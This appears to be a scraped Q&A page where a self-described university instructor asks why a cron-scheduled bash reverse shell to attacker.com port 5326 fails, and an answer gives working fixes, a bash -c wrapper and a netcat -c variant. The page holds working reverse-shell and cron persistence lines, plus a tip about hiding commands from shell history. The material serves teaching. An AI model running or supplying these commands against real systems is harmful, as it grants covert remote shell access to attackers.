Logo Questions Linux Laravel Mysql Ubuntu Git Menu
 

Bash reverse shell command cron job not working - I give up

I teach Cybersecurity at a university and am writing a lab on Netcat and reverse shells. I have created a cron job that runs a script that connects to my listener. That works fine. Problem is there is too much of a fingerprint with that and the script can be deleted. Part of the lab is on stealth operations (like putting a space in front of any command that is entered).

I am trying to get this command to execute. Right now the frequency isn’t important though eventually it will run on boot and every 30 minutes.

/bin/bash -i >& /dev/tcp/attacker.com/5326 0>&1

When run from the command line the command works and the reverse shell is established. I don’t want to use port 80 because I DO want this blocked if a student decides to attempt something stupid. Also the next lab is on iptables to block this port.

I’ve tried quotes. I’ve tried sudo. Double ampersands at the end. Single ampersands at the end. Further qualifications of the path to /tcp/. I don’t think I need to establish what tty session it’s run from (that would be tough). In no case is the cron-run command successful.

crontab -l

# Edit this file to introduce tasks to be run by cron.
# 
# Each task to run has to be defined through a single line
# indicating with different fields when the task will be run
# and what command to run for the task
# 
# To define the time you can provide concrete values for
# minute (m), hour (h), day of month (dom), month (mon),
# and day of week (dow) or use '*' in these fields (for 'any').# 
# Notice that tasks will be started based on the cron's system
# daemon's notion of time and timezones.
# 
# Output of the crontab jobs (including errors) is sent through
# email to the user the crontab file belongs to (unless redirected).
# 
# For example, you can run a backup of all your user accounts
# at 5 a.m every week with:
# 0 5 * * 1 tar -zcf /var/backups/home.tgz /home/
# 
# For more information see the manual pages of crontab(5) and cron(8)
# 
# m h  dom mon dow   command
* * * * * /bin/bash -i >& /dev/tcp/attacker.com/5326 0>&1

Here is the syslog

cat /var/log/syslog 

Mar 19 07:42:01 raspberrypi CRON[12921]: (pi) CMD (/bin/bash -i >& /dev/tcp/attacker.com/5326 0>&1)
Mar 19 07:42:01 raspberrypi CRON[12917]: (CRON) info (No MTA installed, discarding output)

It doesn’t appear to be failing ... it’s just not working.

So to the many many people smarter than I here, what am I doing wrong and how do I get this command to work as a cron job (calling a script is not an option)?

UPDATE: solution is * * * * * /bin/bash -c 'bash -i >& /dev/tcp/attacker.com/5326 0>&1' although there are two errors that I am still working on resolving.

like image 531
C0ntr07 Avatar asked Mar 04 '23 07:03

C0ntr07


1 Answers

/dev/tcp bashism

Note that /dev/tcp/host/port is a bashism!

cron will not understand them!

You could try:

* * * * * /bin/bash -c '/bin/bash -i >& /dev/tcp/attacker.com/5326 0>&1'

or use non bash way:

using netcat for sample:

* * * * * /usr/bin/nc -c /bin/bash\ -i attacker.com 5326 0>&1

(See man nc.traditional vs man nc.openbsd)

like image 142
F. Hauri Avatar answered Mar 26 '23 01:03

F. Hauri